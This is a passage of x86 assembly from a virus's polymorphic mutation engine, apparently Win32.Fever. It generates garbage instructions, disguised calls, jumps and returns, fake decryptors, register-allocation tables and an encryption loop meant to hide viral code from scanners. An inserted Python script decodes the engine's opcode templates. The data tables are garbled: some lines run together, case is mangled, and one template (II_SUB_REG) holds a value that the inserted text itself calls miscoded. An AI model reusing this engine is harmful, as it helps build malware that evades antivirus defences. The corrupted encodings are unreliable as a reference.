                call    get_valid_reg
                or      byte ptr [ebx+reg_flags],reg_read_only

; ============================================================
; Move displacement into aux reg
; ============================================================

                mov     al,0b8h
                or      al,byte ptr [ebx+reg_mask]
                stosb
                pop     eax
                neg     eax
                stosd
                ret

; ===========================================================================
; Generate push reg / garbage / pop reg
; ===========================================================================

g_push_g_pop:   call    gen_garbage
                call    get_rnd32
                test    al,01h
                jnz     skip_sp_push
                call    push_with_sp
                jmp     short from_push
skip_sp_push:   call    get_rnd_reg
                mov     al,50h                  ; 50+r = push reg32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    gen_garbage
from_push:      call    get_rnd32
                test    al,01h
                jz      pop_with_sp
                call    get_valid_reg
                mov     al,58h                  ; 58+r = pop reg32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    gen_garbage
                ret

; ===========================================================================
; Emulate a push instruction, using sub esp,00000004h
; ===========================================================================

push_with_sp:   mov     eax,0004ec83h           ; 83 ec 04 = sub esp,4
                stosd
                dec     edi
                call    gengarbageex
                ret

; ===========================================================================
; Emulate a pop instruction, using add esp,00000004h
; ===========================================================================

pop_with_sp:    mov     eax,0004c483h           ; 83 c4 04 = add esp,4
                stosd
                dec     edi
                call    gengarbageex
                ret

; ===========================================================================
; Generate ret in different ways
; ===========================================================================

gen_ret:        call    get_rnd32
                and     al,01h
                jnz     just_ret
                call    get_valid_reg
                mov     al,58h                  ; pop reg32
                or      al,byte ptr [ebx+reg_mask]
                stosb
                or      byte ptr [ebx+reg_flags],reg_read_only
                push    ebx
                call    gengarbageex
                pop     ebx
                xor     byte ptr [ebx+reg_flags],reg_read_only
                mov     ax,0e0ffh               ; jmp reg32
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                ret
just_ret:       mov     al,0c3h
                stosb
                ret

; ===========================================================================
; Generate call without return
; ===========================================================================

g_call_cont:    mov     al,0e8h                 ; call rel32
                stosb
                push    edi
                stosd
                call    gen_rnd_block
                pop     edx
                mov     eax,edi
                sub     eax,edx
                sub     eax,00000004h
                mov     dword ptr [edx],eax
                call    gengarbageex
                call    get_rnd32
                test    al,01h
                jz      pop_with_sp
                call    get_valid_reg
                mov     al,58h                  ; pop reg32 (discard return address)
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    gen_garbage
                ret

; ===========================================================================
; Generate unconditional jumps
; ===========================================================================

g_jump_u:       mov     al,0e9h                 ; jmp rel32
                stosb
                push    edi
                stosd
                call    gen_rnd_block
                pop     edx
                mov     eax,edi
                sub     eax,edx
                sub     eax,00000004h
                mov     dword ptr [edx],eax
                call    gengarbageex
                ret

g_save_jump:    mov     al,0e9h
                stosb
                push    edi
                stosd
                call    gen_rnd_block
                pop     edx
                mov     eax,edi
                sub     eax,edx
                sub     eax,00000004h
                mov     dword ptr [edx],eax
                ret

; ===========================================================================
; Generate conditional jumps
; ===========================================================================

g_jump_c:       call    get_rnd32
                and     ah,0fh
                add     ah,80h                  ; 0f 80+cc = jcc rel32
                mov     al,0fh
                stosw
                push    edi
                stosd
                call    gengarbageex
                pop     edx
                mov     eax,edi
                sub     eax,edx
                sub     eax,00000004h
                mov     dword ptr [edx],eax
                call    gengarbageex
                ret

g_save_jump_c:  call    get_rnd32
                and     ah,0fh
                add     ah,80h
                mov     al,0fh
                stosw
                xor     eax,eax                 ; rel32 = 0: falls through
                stosd
                ret

; ===========================================================================
; Generate mov [mem],reg
; ===========================================================================

gen_mov_mem8:   mov     dl,88h
                jmp     mem8wr
gen_mov_mem16:  mov     al,66h
                stosb
gen_mov_mem32:  mov     dl,89h
                jmp     gen_mem_wr

gen_add_mem8:   mov     dl,00h
                jmp     mem8wr
gen_add_mem16:  mov     al,66h
                stosb
gen_add_mem32:  mov     dl,01h
                jmp     gen_mem_wr

gen_sub_mem8:   mov     dl,28h
                jmp     mem8wr
gen_sub_mem16:  mov     al,66h
                stosb
gen_sub_mem32:  mov     dl,29h
                jmp     gen_mem_wr

gen_adc_mem8:   mov     dl,10h
                jmp     mem8wr
gen_adc_mem16:  mov     al,66h
                stosb
gen_adc_mem32:  mov     dl,11h
                jmp     gen_mem_wr

gen_sbb_mem8:   mov     dl,18h
                jmp     mem8wr
gen_sbb_mem16:  mov     al,66h
                stosb
gen_sbb_mem32:  mov     dl,19h
                jmp     gen_mem_wr

gen_or_mem8:    mov     dl,08h
                jmp     mem8wr
gen_or_mem16:   mov     al,66h
                stosb
gen_or_mem32:   mov     dl,09h
                jmp     gen_mem_wr

gen_and_mem8:   mov     dl,20h
                jmp     mem8wr
gen_and_mem16:  mov     al,66h
                stosb
gen_and_mem32:  mov     dl,21h
                jmp     gen_mem_wr

gen_xor_mem8:   mov     dl,30h
                jmp     mem8wr
gen_xor_mem16:  mov     al,66h
                stosb
gen_xor_mem32:  mov     dl,31h
                jmp     gen_mem_wr

mem8wr:         call    gen_mem_wr
                call    get_rnd32
                and     al,20h
                or      byte ptr [edi-00000005h],al     ; randomly use the high 8-bit half
                ret

gen_mem_wr:     call    get_rnd_reg
                mov     ah,byte ptr [ebx+reg_mask]
                or      ah,ah
                jnz     skip_wr_eax
                cmp     dl,88h
                je      gen_mem_wr
                cmp     dl,89h
                je      gen_mem_wr
skip_wr_eax:    shl     ah,03h
                or      ah,05h                  ; modrm: [disp32]
                mov     al,dl
                stosw
                movzx   eax,byte ptr [ebp+numberofdataareas]
                call    get_rnd_range
                lea     esi,dword ptr [ebp+tbl_data_area+eax*08h]
                lodsd
                push    eax
                lodsd
                sub     eax,00000004h
                call    get_rnd_range
                pop     edx
                add     eax,edx
                stosd
                ret

; ===========================================================================
; Generate clc/stc/cmc/cld/std
; ===========================================================================

gen_save_code:  mov     eax,end_save_code-tbl_save_code
                call    get_rnd_range
                mov     al,byte ptr [ebp+tbl_save_code+eax]
                stosb
                ret

; ===========================================================================
; Generate fake decrypt instructions
; ===========================================================================

gen_fake_crypt: cmp     byte ptr [ebp+recursive_level],03h
                jae     bad_fake_size
                cmp     byte ptr [ebp+numberofdataareas],02h
                jb      bad_fake_size
                push    dword ptr [ebp+fake_ptr_disp]
                push    dword ptr [ebp+fake_crypt_key]
                mov     dl,byte ptr [ebp+fake_build_flags]
                mov     dh,byte ptr [ebp+fake_index_mask]
                shl     edx,08h
                mov     dl,byte ptr [ebp+fake_oper_size]
                push    edx
                call    get_rnd32               ; get encryption key
                mov     dword ptr [ebp+fake_crypt_key],eax
                call    get_rnd32               ; get generation flags
                mov     byte ptr [ebp+fake_build_flags],al
                call    get_rnd32               ; get size of mem operand
                and     al,03h
                cmp     al,01h
                je      ok_fake_size
                cmp     al,02h
                je      ok_fake_size
                inc     al
ok_fake_size:   mov     byte ptr [ebp+fake_oper_size],al
                call    get_rnd32               ; choose displacement
                and     eax,00000001h
                jz      ok_fake_disp
                call    get_rnd32
                call    get_rnd_range
                inc     eax
                neg     eax
ok_fake_disp:   mov     dword ptr [ebp+fake_ptr_disp],eax
                movzx   eax,byte ptr [ebp+numberofdataareas]
                call    get_rnd_range
                lea     esi,dword ptr [ebp+tbl_data_area+eax*08h]
                lodsd
                add     eax,dword ptr [ebp+fake_ptr_disp]
                push    eax
                lodsd
                sub     eax,00000004h
                call    get_rnd_range
                pop     edx
                add     eax,edx
                push    eax
                call    get_valid_reg
                or      byte ptr [ebx+reg_flags],reg_is_index
                mov     al,byte ptr [ebx+reg_mask]
                mov     byte ptr [ebp+fake_index_mask],al
                or      al,0b8h
                stosb
                pop     eax
                stosd
                push    ebx
                call    gengarbageex            ; garbage
                call    fake_or_not
                call    gengarbageex            ; garbage
                pop     ebx
                xor     byte ptr [ebx+reg_flags],reg_is_index
                pop     eax
                mov     byte ptr [ebp+fake_oper_size],al
                shr     eax,08h
                mov     byte ptr [ebp+fake_index_mask],ah
                mov     byte ptr [ebp+fake_build_flags],al
                pop     dword ptr [ebp+fake_crypt_key]
                pop     dword ptr [ebp+fake_ptr_disp]
bad_fake_size:  ret

; ===========================================================================
; Get a random reg
; ===========================================================================

get_rnd_reg:    mov     eax,00000007h
                call    get_rnd_range
                lea     ebx,dword ptr [ebp+tbl_regs+eax*02h]
                ret

; ===========================================================================
; Get a random reg (avoid reg_read_only, reg_is_counter and reg_is_index)
; ===========================================================================

get_valid_reg:  call    get_rnd_reg
                mov     al,byte ptr [ebx+reg_flags]
                and     al,reg_is_index or reg_is_counter or reg_read_only
                jnz     get_valid_reg
                ret

; ===========================================================================
; Load ecx with crypt_size / oper_size
; ===========================================================================

; The label and the size load below were lost in extraction; they are
; reconstructed from the call site (call fixed_size2ecx) and this header.
fixed_size2ecx: mov     eax,dword ptr [ebp+sizecrypt]
                xor     ecx,ecx
                mov     cl,byte ptr [ebp+oper_size]
                shr     ecx,01h
                or      ecx,ecx
                jz      ok_2ecx
                shr     eax,cl
                jnc     ok_2ecx
                inc     eax
ok_2ecx:        mov     ecx,eax
                ret

; ===========================================================================
; Generate polymorphic decryptor... what's new on this poly engine?
;
; On entry:
;       esi -> pointer to code
;       edi -> where to generate polymorphic decryptor
;       ecx -> size of area to encrypt
;       edx -> entry point to code once decrypted
; On exit:
;       ecx -> decryptor size
;       edi -> end of decryptor
;
; ===========================================================================

mutate:         push    ebx                             ; save base address
                add     edx,ebx
                mov     dword ptr [ebp+ptrtoep],edx     ; save ptr to entry-point
                mov     dword ptr [ebp+ptrtocrypt],esi  ; save crypt offset
                mov     dword ptr [ebp+ptrtodecrypt],edi
                mov     dword ptr [ebp+sizecrypt],ecx   ; save size of block
                lea     esi,dword ptr [ebp+tbl_startup]
                lea     edi,dword ptr [ebp+tbl_regs+reg_flags]
                mov     ecx,00000007h
loop_init_regs: lodsb
                stosb
                inc     edi
                loop    loop_init_regs
                xor     eax,eax
                mov     byte ptr [ebp+numberofdataareas],al     ; clear # of data areas
                mov     byte ptr [ebp+recursive_level],al       ; clear recursive level
                mov     ecx,num_da
                lea     edi,dword ptr [ebp+tbl_data_area]       ; init data areas
loop_init_da:   stosd
                stosd
                loop    loop_init_da
                call    get_valid_reg
                mov     al,byte ptr [ebx+reg_mask]
                mov     byte ptr [ebp+index_mask],al
                or      byte ptr [ebx+reg_flags],reg_is_index
                xor     eax,eax
                mov     ecx,00000005h
                lea     edi,dword ptr [ebp+style_table+00000004h]
clear_style:    stosd
                add     edi,00000004h
                loop    clear_style
                call    get_valid_reg
                mov     al,byte ptr [ebx+reg_mask]
                mov     byte ptr [ebp+counter_mask],al
                or      byte ptr [ebx+reg_flags],reg_is_counter
                call    get_rnd32
                and     eax,00000001h
                jz      ok_disp
                call    get_rnd32
ok_disp:        mov     dword ptr [ebp+ptr_disp],eax
                call    get_rnd32
                mov     dword ptr [ebp+crypt_key],eax
                call    get_rnd32
                mov     byte ptr [ebp+build_flags],al
                call    get_rnd32
                and     al,03h
                cmp     al,01h
                je      get_size_ok
                cmp     al,02h
                je      get_size_ok
                inc     al
get_size_ok:    mov     byte ptr [ebp+oper_size],al
                mov     edi,dword ptr [ebp+ptrtodecrypt]        ; ptr to decryptor
                call    gen_rnd_block                           ; random data block
                mov     ecx,00000005h                           ; generate 5 routines
do_subroutine:  push    ecx
routine_done:   mov     eax,00000005h                           ; random step
                call    get_rnd_range
                lea     esi,dword ptr [ebp+style_table+eax*08h]
                xor     edx,edx                                 ; already generated?
                cmp     dword ptr [esi+00000004h],edx
                jne     routine_done
                push    edi                                     ; generate routine
                call    gengarbageex
                lodsd
                pop     dword ptr [esi]
                add     eax,ebp
                call    eax
                call    gengarbageex
                call    gen_ret
                call    gen_rnd_block
                pop     ecx                                     ; generate next subroutine
                loop    do_subroutine
                mov     dword ptr [ebp+entry_point],edi         ; decryptor entry-point

; ============================================================
; If this is the 1st decryptor we need to save
; some regs
; ============================================================

                cmp     byte ptr [ebp+isfirst],00h
                je      skipsaveregs
                mov     al,reg_read_only
                or      byte ptr [ebp+tbl_reg_ebx+01h],al
                or      byte ptr [ebp+tbl_reg_esi+01h],al
                or      byte ptr [ebp+tbl_reg_edi+01h],al
                or      byte ptr [ebp+tbl_reg_ebp+01h],al
                mov     byte ptr [ebp+recursive_level],04h
                mov     ecx,00000004h
                lea     esi,dword ptr [ebp+pshpstepindex]
dorestorepush:  push    ecx
                push    esi
                call    geninitgarbage
                pop     esi
                lodsd
                lea     edx,dword ptr [ebp+eax+tbldopush]
                mov     al,byte ptr [edx]
                stosb
                mov     dl,not reg_read_only
trytofixebx:    cmp     al,053h                 ; push ebx
                jne     trytofixesi
                and     byte ptr [ebp+tbl_reg_ebx+01h],dl
                jmp     shitisfixed
trytofixesi:    cmp     al,056h                 ; push esi
                jne     trytofixedi
                and     byte ptr [ebp+tbl_reg_esi+01h],dl
                jmp     shitisfixed
trytofixedi:    cmp     al,057h                 ; push edi
                jne     trytofixebp
                and     byte ptr [ebp+tbl_reg_edi+01h],dl
                jmp     shitisfixed
trytofixebp:    cmp     al,055h                 ; push ebp
                jne     shitisfixed
                and     byte ptr [ebp+tbl_reg_ebp+01h],dl
shitisfixed:    pop     ecx
                loop    dorestorepush
                mov     byte ptr [ebp+recursive_level],00h
                and     byte ptr [ebp+tbl_reg_ebx+01h],dl
                and     byte ptr [ebp+tbl_reg_esi+01h],dl
                and     byte ptr [ebp+tbl_reg_edi+01h],dl
                and     byte ptr [ebp+tbl_reg_ebp+01h],dl

; ============================================================
; ...build the jz/jnz instruction (at the end of the decryptor
; loop) at runtime
; ============================================================

skipsaveregs:   call    gengarbageex
                test    byte ptr [ebp+build_flags],crypt_fog
                jz      noendfog
fuckfogebp:     call    get_valid_reg
                cmp     byte ptr [ebx+reg_mask],00000101b       ; [ebp] needs a displacement
                je      fuckfogebp
                or      byte ptr [ebx+reg_flags],reg_read_only
                mov     dword ptr [ebp+xrndreg],ebx
                push    ebx
                mov     al,byte ptr [ebx+reg_mask]
                or      al,0b8h
                stosb
                call    get_rnd32
                stosd
                mov     dword ptr [ebp+xrnd1],eax
                call    gengarbageex
                mov     dword ptr [ebp+xrndfixptr],edi
                add     edi,00000006h                   ; room for the fix instruction
                call    gen_garbage
                mov     dword ptr [ebp+xrndmath],edi
                add     edi,00000006h                   ; room for the math instruction
                pop     ebx
                xor     byte ptr [ebx+reg_flags],reg_read_only
                call    gen_garbage

; ============================================================
; Generate calls to each routine inside garbage code
; ============================================================

noendfog:       lea     esi,dword ptr [ebp+style_table+00000004h]
                mov     ecx,00000005h
do_call:        push    ecx                     ; gen call to each step
                cmp     ecx,00000003h
                jne     is_not_loop
                call    gengarbageex
                mov     dword ptr [ebp+loop_point],edi
is_not_loop:    call    gengarbageex
                call    get_rnd32
                and     al,01h
                jz      mutatecall
standardcall:   mov     al,0e8h                 ; call opcode
                stosb
                lodsd
                sub     eax,edi
                sub     eax,00000004h
                stosd
                jmp     donemutatecall

callstepadd:    mov     ax,0c081h
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                lodsd
                call    frompoly2rva
                sub     eax,edx
                stosd
                ret

callstepsub:    mov     ax,0e881h
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                lodsd
                call    frompoly2rva
                neg     eax
                add     eax,edx
                stosd
                ret

callstepxor:    mov     ax,0f081h
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                lodsd
                call    frompoly2rva
                xor     eax,edx
                stosd
                ret

mutatecall:     push    esi
                call    get_valid_reg
                or      byte ptr [ebx+reg_flags],reg_read_only
                mov     al,0b8h
                or      al,byte ptr [ebx+reg_mask]
                stosb
                call    get_rnd32
                stosd
                push    eax
                push    ebx
                call    gengarbageex
                pop     ebx
                mov     eax,numcallstep
                call    get_rnd_range
                lea     esi,dword ptr [ebp+tbl_call_step+eax*04h]
                lodsd
                add     eax,ebp
                pop     edx
                pop     esi
                push    ebx
                call    eax
                call    gengarbageex
                pop     ebx
                mov     ax,0d0ffh               ; ff d0+r = call reg32
                or      ah,byte ptr [ebx+reg_mask]
                stosw
                xor     byte ptr [ebx+reg_flags],reg_read_only
donemutatecall: call    gengarbageex
                lodsd
                pop     ecx
                loop    do_call
                call    gengarbageex            ; end condition
                call    gen_loop
                call    gen_rnd_block
                pop     ebx
                push    edi
                sub     edi,dword ptr [ebp+ptrtodecrypt]
                push    edi
                mov     edi,dword ptr [ebp+ptrtocrypt]
                add     edi,ebx
                call    fixed_size2ecx          ; encrypt requested area
loop_hide_code: push    ecx
                mov     eax,dword ptr [edi]
                call    perform_crypt
                xor     ecx,ecx
                mov     cl,byte ptr [ebp+oper_size]
loop_copy_res:  stosb
                shr     eax,08h
                loop    loop_copy_res
                pop     ecx
                loop    loop_hide_code
                mov     edx,dword ptr [ebp+entry_point]
                sub     edx,ebx                 ; get entry-point offset
                pop     ecx
                pop     edi
                ret

; ================================================== ===========================

Poly Engine Initialized Data

; ================================================== ===========================

; ================================================== ===========; Register Table

;

; 00h -> Byte -> Register Mask

; 01H -> BYTE -> Register Flags

; ================================================== ===========

TBL_REGS EQU $

DB 00000000B, REG_READ_ONLY; EAX

TBL_REG_EBX DB 00000011B, 00H; EBX

DB 00000001B, 00H; ECX

DB 00000010B, 00H; EDX

TBL_REG_ESI DB 00000110B, REG_NO_8BIT; ESI

TBL_REG_EDI DB 00000111B, REG_NO_8bit; EDI

TBL_REG_EBP DB 00000101B, REG_NO_8BIT; EBP

END_REGS EQU $

; ================================================== ===========

Aliases for REG TABLE STRUCTURE

; ================================================== ===========

REG_MASK EQU 00H

REG_FLAGS EQU 01H

; ================================================== ===========; Bit Aliases for REG FLAGS

; ================================================== ===========

REG_IS_INDEX EQU 01H; Register Used As Main Index Register

REG_IS_COUNTER EQU 02H; this Register IS Used As Loop Counter

REG_READ_ONLY EQU 04H; Never Modify The Value of this Register

REG_NO_8BIT EQU 08H; ESI EDI AND EBP HAVENT 8BIT VERSION

; ================================================== ===========

; Initial Reg Flags

; ================================================== ===========

TBL_STARTUP EQU $

DB REG_READ_ONLY; EAX

DB 00H; EBX

DB 00H; ECX

DB 00H; EDX

DB REG_NO_8bit; ESI

DB REG_NO_8bit; EDI

DB REG_NO_8bit; EBP

; ================================================== ===========; Code That Does Not Disturb Reg Values

; ================================================== ===========

TBL_SAVE_CODE EQU $

CLC

STC

CMC

CLD

STD

END_SAVE_CODE EQU $

; ================================================== ===========

Generators for [R] indexing mode

; ================================================== ===========

TBL_IDX_REG EQU $

DD Offset XX_INC_REG

DD Offset XX_DEC_REG

DD Offset XX_NOT_REG

DD Offset XX_ADD_REG

DD Offset XX_SUB_REG

DD offset xx_xor_reg

; ================================================== ===========; Generators for [REG IMM] indexing mode

; ================================================== ===========

TBL_DIS_REG EQU $

DD Offset YY_INC_REG

DD Offset YY_DEC_REG

DD Offset YY_NOT_REG

DD Offset YY_ADD_REG

DD Offset YY_SUB_REG

DD Offset YY_XOR_REG

; ================================================== ===========

Generators for [REG REG] INDEXING MODE

; ================================================== ===========

TBL_XTENDED EQU $

DD Offset ZZ_INC_REG

DD Offset ZZ_DEC_REG

DD Offset ZZ_NOT_REG

DD Offset ZZ_ADD_REG

DD Offset ZZ_SUB_REG

DD Offset ZZ_XOR_REG

; ================================================== ===========; GENERATORS for [REG REG IMM] indexing mode

; ================================================== ===========

TBL_PARANOIA EQU $

DD Offset II_INC_REG

DD Offset II_DEC_REG

DD Offset II_NOT_REG

DD Offset II_ADD_REG

DD Offset II_SUB_REG

DD Offset II_XOR_REG

; ================================================== ===========

Opcodes for Math Reg, IMM

; ================================================== ===========

TBL_MATH_IMM EQU $

DB 0C0H; Add

DB 0C8H; OR

DB 0E0H; And

DB 0E8H; SUB

DB 0F0H; xor

DB 0D0H; ADC

DB 0D8H; SBB

END_MATH_IMM EQU $

; ================================================== ===========; Magic Aliases

; ================================================== ===========

Magic_putKey EQU 01H

Magic_putdisp EQU 02H

Magic_ENDSTR EQU 0FFH

Magic_ENDKEY EQU 0FEH

Magic_careebp EQU 00H

Magic_notebp EQU 0FFH

; ================================================== ===========

Magic Data

; ================================================== ===========

XX_INC_REG DB 0FEH

DB Magic_Careebp

DB 00H

DB 00H

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

XX_DEC_REG DB 0FEH

DB Magic_Careebp

DB 08H

DB 00H

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

XX_NOT_REG DB 0F6H

DB Magic_Careebp

DB 10h

DB 00H

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD OFFSET X_NOT_REG_DWORDXX_ADD_REG DB 80H

DB Magic_Careebp

DB 00H

DB Magic_putKey

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

XX_SUB_REG DB 80H

DB Magic_Careebp

DB 28h

DB Magic_putKey

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

XX_XOR_REG DB 80H

DB Magic_Careebp

DB 30h

DB Magic_putKey

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

YY_INC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 80h

DB Magic_putdisp

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

YY_DEC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 88H

DB Magic_putdisp

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

YY_NOT_REG DB 0F6H

DB MAGIC_NOTEBP

DB 90h

DB Magic_putdisp

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

YY_ADD_REG DB 80H

DB MAGIC_NOTEBP

DB 80h

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

YY_SUB_REG DB 80H

DB MAGIC_NOTEBP

DB 0A8H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

YY_XOR_REG DB 80H

DB MAGIC_NOTEBP

DB 0B0H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

ZZ_INC_REG DB 0FEH

DB Magic_Careebp

DB 04H

DB 00H

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

ZZ_DEC_REG DB 0FEH

DB Magic_Careebp

DB 0CH

DB 00H

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

ZZ_NOT_REG DB 0F6H

DB Magic_Careebp

DB 14h

DB 00H

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

ZZ_ADD_REG DB 80HDB MAGIC_CAREBP

DB 04H

DB Magic_putKey

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

ZZ_SUB_REG DB 80H

DB Magic_Careebp

DB 2ch

DB Magic_putKey

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

ZZ_XOR_REG DB 80H

DB Magic_Careebp

DB 34H

DB Magic_putKey

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword

II_INC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 84H

DB Magic_putdisp

DD Offset X_INC_REG_BYTE

DD Offset X_INC_REG_WORD

DD Offset X_INC_REG_DWORD

II_DEC_REG DB 0FEH

DB MAGIC_NOTEBP

DB 8ch

DB Magic_putdisp

DD Offset X_Dec_reg_byte

DD Offset X_Dec_reg_word

DD Offset X_Dec_reg_dword

II_NOT_REG DB 0F6H

DB MAGIC_NOTEBP

DB 94H

DB Magic_putdisp

DD Offset X_Not_Reg_Byte

DD offset x_not_reg_word

DD Offset X_Not_Reg_dword

II_ADD_REG DB 80H

DB MAGIC_NOTEBP

DB 84H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Add_reg_byte

DD offset x_add_reg_word

DD offset x_add_reg_dword

II_SUB_REG DB 80H

DB MAGIC_NOTEBP

DB 0ch

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD Offset X_Sub_Reg_Byte

DD Offset X_Sub_Reg_Word

DD Offset X_Sub_Reg_dword

II_XOR_REG DB 80H

DB MAGIC_NOTEBP

DB 0B4H

DB MAGIC_PUTKEY or MAGIC_PUTDISP

DD offset x_xor_reg_byte

DD offset x_xor_reg_word

DD offset x_xor_reg_dword
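The four magic-data families above are nothing more than an opcode plus a ModRM base byte whose mod/rm fields fix the addressing mode and whose reg field is the /digit of the operation. The following is an added analyst-side example, not code from the Win32.Fever listing: it decodes each (opcode, ModRM base) pair into a readable instruction form and checks every family for internal consistency (operand shape, mnemonic implied by the label, and the ebp care flag against the mod field). The `TEMPLATES` dictionary is transcribed from the tables; the group and shape maps are plain x86 encoding facts. Only the byte-width opcodes held in the tables are decoded; the word/dword variants are out of scope here.

```python
# Added example (analyst tooling), not part of the Win32.Fever source.
# Decodes the opcode/ModRM-base templates of the "magic data" tables and
# checks each addressing-mode family for internal consistency.

# ModRM reg field (/digit) -> mnemonic, for the three opcode groups the tables use.
GROUPS = {
    0xFE: {0: "inc", 1: "dec"},
    0xF6: {2: "not"},
    0x80: {0: "add", 1: "or", 2: "adc", 3: "sbb", 4: "and", 5: "sub", 6: "xor", 7: "cmp"},
}

# (mod, rm == 100b) -> memory operand shape; rm=100 means a SIB byte follows ([base+index]).
SHAPES = {
    (0, False): "[reg]",
    (2, False): "[reg+disp32]",
    (0, True): "[reg+reg]",
    (2, True): "[reg+reg+disp32]",
}

MAGIC_CAREEBP = 0x00   # values from the listing's "Magic aliases"
MAGIC_NOTEBP = 0xFF


def decode_template(opcode, modrm_base):
    """Return (mnemonic, operand shape) for one table entry; raise on an unknown form."""
    mod, reg, rm = modrm_base >> 6, (modrm_base >> 3) & 7, modrm_base & 7
    try:
        return GROUPS[opcode][reg], SHAPES[(mod, rm == 4)]
    except KeyError as exc:
        raise ValueError(f"no template form for opcode {opcode:02X}h ModRM {modrm_base:02X}h") from exc


def ebp_needs_care(modrm_base):
    """mod=00 with rm=101 (or a SIB base of 101) means 'disp32, no base register',
    so ebp cannot be used there; the tables flag those entries MAGIC_CAREEBP."""
    return (modrm_base >> 6) == 0


def check_family(shape, entries):
    """entries: (label, opcode, modrm_base, ebp_flag). Returns the labels that do not
    decode to the family's shape, contradict the mnemonic in their own label, or
    carry an ebp flag inconsistent with their mod field."""
    bad = []
    for label, opcode, base, ebp_flag in entries:
        try:
            mnem, got = decode_template(opcode, base)
        except ValueError:
            bad.append(label)
            continue
        expect_flag = MAGIC_CAREEBP if ebp_needs_care(base) else MAGIC_NOTEBP
        if got != shape or mnem != label.split("_")[1].lower() or ebp_flag != expect_flag:
            bad.append(label)
    return bad


# Transcribed from the magic-data tables (constructed input for the checker).
TEMPLATES = {
    "[reg]": [
        ("XX_INC_REG", 0xFE, 0x00, MAGIC_CAREEBP), ("XX_DEC_REG", 0xFE, 0x08, MAGIC_CAREEBP),
        ("XX_NOT_REG", 0xF6, 0x10, MAGIC_CAREEBP), ("XX_ADD_REG", 0x80, 0x00, MAGIC_CAREEBP),
        ("XX_SUB_REG", 0x80, 0x28, MAGIC_CAREEBP), ("XX_XOR_REG", 0x80, 0x30, MAGIC_CAREEBP),
    ],
    "[reg+disp32]": [
        ("YY_INC_REG", 0xFE, 0x80, MAGIC_NOTEBP), ("YY_DEC_REG", 0xFE, 0x88, MAGIC_NOTEBP),
        ("YY_NOT_REG", 0xF6, 0x90, MAGIC_NOTEBP), ("YY_ADD_REG", 0x80, 0x80, MAGIC_NOTEBP),
        ("YY_SUB_REG", 0x80, 0xA8, MAGIC_NOTEBP), ("YY_XOR_REG", 0x80, 0xB0, MAGIC_NOTEBP),
    ],
    "[reg+reg]": [
        ("ZZ_INC_REG", 0xFE, 0x04, MAGIC_CAREEBP), ("ZZ_DEC_REG", 0xFE, 0x0C, MAGIC_CAREEBP),
        ("ZZ_NOT_REG", 0xF6, 0x14, MAGIC_CAREEBP), ("ZZ_ADD_REG", 0x80, 0x04, MAGIC_CAREEBP),
        ("ZZ_SUB_REG", 0x80, 0x2C, MAGIC_CAREEBP), ("ZZ_XOR_REG", 0x80, 0x34, MAGIC_CAREEBP),
    ],
    "[reg+reg+disp32]": [
        ("II_INC_REG", 0xFE, 0x84, MAGIC_NOTEBP), ("II_DEC_REG", 0xFE, 0x8C, MAGIC_NOTEBP),
        ("II_NOT_REG", 0xF6, 0x94, MAGIC_NOTEBP), ("II_ADD_REG", 0x80, 0x84, MAGIC_NOTEBP),
        ("II_SUB_REG", 0x80, 0xAC, MAGIC_NOTEBP), ("II_XOR_REG", 0x80, 0xB4, MAGIC_NOTEBP),
    ],
}


def check_all(templates=TEMPLATES):
    """Map each family shape to its list of inconsistent labels (all empty when consistent)."""
    return {shape: check_family(shape, entries) for shape, entries in templates.items()}


if __name__ == "__main__":
    for shape, entries in TEMPLATES.items():
        for label, opcode, base, _ in entries:
            mnem, got = decode_template(opcode, base)
            print(f"{label:<12} {opcode:02X} {base:02X}  {mnem} byte ptr {got}")
    print(check_all())
```

Feeding the checker a miscoded entry such as `("II_SUB_REG", 0x80, 0x0C, MAGIC_NOTEBP)` reports it, because 0Ch decodes to `dec byte ptr [reg+reg]` rather than the `sub ... [reg+reg+disp32]` form the family requires.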

; =============================================================
; Reverse-code strings (first byte = length, then the bytes,
; then MAGIC_ENDSTR or MAGIC_ENDKEY when the key follows).
; These undo the decryptor operation on the accumulator.
; =============================================================

X_INC_REG_BYTE  db      02h,0FEh,0C8h,MAGIC_ENDSTR      ; dec al
